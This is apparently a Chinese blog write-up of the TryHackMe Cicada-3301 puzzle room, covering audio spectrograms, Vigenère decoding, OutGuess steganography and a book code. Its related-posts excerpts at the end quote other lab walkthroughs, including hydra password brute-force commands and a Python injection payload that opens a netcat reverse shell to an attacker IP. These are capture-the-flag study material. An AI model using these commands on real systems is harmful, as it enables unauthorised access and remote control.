TryHackMe Cicada-3301 Vol1
TryHackMe | Cicada-3301 Vol:1
一、分析音频软件
先把文件下载到本地使用unzip解压缩,得到一个音频文件和一个图片
- 我们这边先查看一下图片里面是什么内容
大致意思:你好。我们正在寻找高智商的人。为了找到他们,我们设计了一个测试。
这张图片里藏有一条信息。找到它,它会指引你踏上寻找我们的道路。我们期待着见到那些能一路坚持到底的少数人。
祝你好运
- 这个图片里面藏着有一条信息,我们这里先分析音频根据页面的提示使用 Sonic Visualizer 分析音频
Sonic Visualiser(中文一般叫「声波可视化工具」)是一个专门用来 可视化和分析音频文件 的开源软件。
它和普通的音乐播放器(比如 VLC、mpv)不同,重点在于「看」而不是「听」:
1 | # 安装方法 |
- 使用命令查看文件后然后在菜单 Pane → Add Spectrogram 就能看到频谱图,出来是一个二维码?
我拿手机扫🐎了一下,跳出一个网站这里告诉我们字段和key了
1
https://pastebin.com/wphPq0Aa
二、解密密码
1 | Passphrase: SG01Ul80X1A0NTVtaHA0NTMh |
- 这里好像是两个base64编码,先拿去解密一下
1 | Hm5R_4_P455mhp453! |
- 这里我试了两个密码以旧无法解密图片,看了一下提示,提了了我们说法国外交官密码,去bing上面搜了一下原来是维吉尼亚密码(Vigenère cipher)
- 拿到厨子上面进行编码一下得到加密后的密码
Ju5T_4_P455phr453!
- 得到一个文件看看里面有什么
三、收集元数据
- 看了一下感觉没有其他的图片了这里估计是让我们将这个图片下载下来分析
四、查找隐藏文件
- 下载到本地我使用steghide和binwalk都没有看了一下wp这里要用Outguess工具对这个图片信息进行查看
OutGuess 是一个经典的隐写术(Steganography)工具,主要用于将信息隐藏在 JPEG 图像或 PPM/PNM 图像 文件中,同时尽量不改变图像的统计特征,让隐藏的数据更难被检测出来。
现在使用outguess查看我们这个网站下载的图片
1 | outguess -r 'undefined - Imgur.jpg' 1.txt |
五、查找数据密码
1 | Here is a book code. To find the book, break this hash: |
- break this hash” 意思是 找到一本书或者文本,验证 SHA1/SHA256 哈希匹配
- 你需要找到原文或电子书作为“密钥文本”(book text)
1 | Use positive integers to go forward in the text use negative integers to go backwards in the text. |
I:x:y 类似指向文本的 行号/单词/字符索引
正整数 → 从开头向前数
负整数 → 从结尾向后数
用这些索引去提取 书中对应字符,组合起来就是谜题答案
这里先把hash值,丢进网址分析一下这段hash是什么类型的
看起来像是SHA512 拿去这个网址解码一下 https://md5hashing.net
得到了一个urlhttps://pastebin.com/6FNiVLh5,访问看看里面有什么
看来这就是我们所要的book了,将他下载下来,在使用命令将提示里面的索引值提取出来最后会给一个短链接
1 | https://bit.ly/39pw2NH |
当它完全解析后,它会返回一个缩短的 URL,将我们重定向到 SoundCloud。
1 | https://soundcloud.com/user-984804993/the-instar-emergence |
是个音乐网站歌名是:The Instar Emergence
听说这个解码背后涉及到了一个挺有意思的故事有兴趣的可以搜索一下
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 0xMouise!
相关推荐
2025-09-16
Agent Sudo Writeup TryHackMe
Agent Sudo | Writeup | TryHackMe、一、信息收集使用nmap对ip地址的端口进行探测 1nmap -sS -sV -A <ip> 可以看到上面80端口开放这一个web服务器我们看看 这里提示了R作为user-agent来进行访问,使用curl命令看看 1curl -A "R" -L 10.10.12.116 这里又给了我们一段提示告诉我们这里不是R但是是26个英文字母之一,然后我去从A开始尝试,到C这里找到了我想要的 二、哈希破解和暴力破解 这里给了我们一个用户名chris但是不知道这个用户是FTP的还是SSH的我们使用hydra来爆破看看 1hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.12.116 ftp 成功爆破出了密码,我们登录看看 下面有一个写给J的文件和两张图片我们全部下载下来 查看写给J的文件其中解释说密码在假图像中 我们使用binwalk来查看文件 binwalk 是一个 二进制...
2025-09-16
Brute It -TryHackMe
Brute It -TryHackMe一、信息收集 使用nmap对网站ip开放端口进行搜集 使用dirsearch发现网站下面有个admin目录访问看看 是一个管理员登录界面 在这个页面右键源代码发现了给我们的提示,告诉我们这个网站的账户是admin,我们抓包使用yakit进行爆破 二、枚举爆破 接下来使用hydra对网站的密码进行爆破 1hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.255.234 http-post-form "/admin/:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid" 拿到了账户密码去登录看看 这里告诉我们john的私钥,已经很明显了先讲私钥保存到本地在使用ssh2john将私钥转化成哈希值在使用john进行爆破 这里成功爆破出密码 rockinroll 使用ssh对john进行登录 我这里遇到了报错这里直接修改私钥权限就...
2025-09-16
Crypto & Hashes - TryHackMe
Crypto & Hashes - TryHackMeCrack the hashLevel 1第一题房间地址:https://tryhackme.com/room/crackthehash 这里给我们一串编码,看起来像是md5 长度:32 个十六进制字符(即 128 位)。例如 48bb6e862e54f2a795ffc4e541caed4d。 表示形式:通常小写或大写 hex(0–9 a–f / A–F)。 我们使用网站进行破解MD5这个网站是一个专门对md5破解的网站 第二题 这个编码有点不认识使用hasdid识别一下 hashid(Python,命令行,轻量) 安装:sudo apt update && sudo apt install -y hashid 或 pip3 install hashid 1hashid CBFDAC6008F9CAB4083784CBD1874F76618D2A97 这里显示SHA-1的可能性比较高,我们拿到网站上破解一下,依旧是上面那个网站 SHA-1特征 字符集:0–9, a–f ...
2025-09-16
DevelPy-TryHackMe
DevelPy-TryHackMe一、信息收集 这次没有开放80端口了,这里nmap扫描出来给了一个很奇怪的服务,这看起来像是靶机作者故意写的一个 交互式 Python 脚本服务,挂在 10000 端口,它会要求你输入内容,然后报错(显示 Python 源码片段),用nc连接试试 1nmap -sV -sC -O 10.10.216.119 二、内网渗透 我这里使用nc连接然后输入了10 这里就返回来 10次数据包,如果开发者用了危险函数(比如 eval(input()) 或 os.system(input())),那就有可能 输入被当成命令执行。 这里我们尝试执行命令的 Python 代码,成功看到了用户权限,那么我们这里就直接构建payload反弹shell 1__import__('os').system('id') 构造payload发送过去 1__import__('os').system('nc -e /bin/sh 10.17.35.134 4444 ') ...
2025-09-16
Ignite – TryHackMe
Ignite – TryHackMe一、信息收集 开启房间后给了我们一个ip地址,去访问看看 我们使用nmap对这个ip的端口进行扫描一下开开有什么开放的端口 这里只开放了一个80端口,访问这个网站介绍了一下是一个cms系统Fuel CMS 1.4 里面大致介绍了一下这个cms的安装指南,里面还管理员的后台地址http://10.10.149.22/fuel和账户密码 去后台管理看一下,在页面这里能进行文件上传 二、漏洞利用 现在知道这个cms版本我们使用searchsploit看看是否有这个版本的漏洞 searchsploit 用来在本地搜索 Exploit-DB 漏洞利用库。 它可以帮你快速找到某个软件/服务/系统对应的已知漏洞和可利用代码(PoC/Exploit)。 先复制出来会在你当前目录生成 查看源码nano 47138.py 将里面的ip更新为要攻击的靶机的ip地址,脚本默认要通过 127.0.0.1:8080 代理发送请求(通常是用来抓 BurpSuite 的包),但是你地并没有开 Burp ...
2025-09-16
Jack-of-All-Trades
Jack-of-All-Trades一、信息收集 先使用nmap扫一下Ip看看开放了哪些端口,这里很奇怪,22端口上面却是部署着http协议,看了一下wp这里要使用浏览器绕过这个限制 1nmap -sS -A -Pn 10.10.196.165 这里使用firefox,在导航栏里面搜索about config然后再出来的搜索框这里再搜索network.security.ports.banned.override在某些 Firefox 版本中,这可能会显示无结果(在这种情况下,在页面上右键单击任何位置,选择 new -> String 并将搜索查询用作首选项名称)——在其他版本中,它将显示与我相同的内容 选择字符串后,然后添加上22 接着再刷新页面就能成功访问了 这里使用dirsearch扫一下这个ip看看有什么文件,这里记得要加22端口 1python3 dirsearch.py -u http://10.10.196.165:22 -e php,html,txt -t 50 -x 403,401 只有一个assets访问一下里面有什么 ...
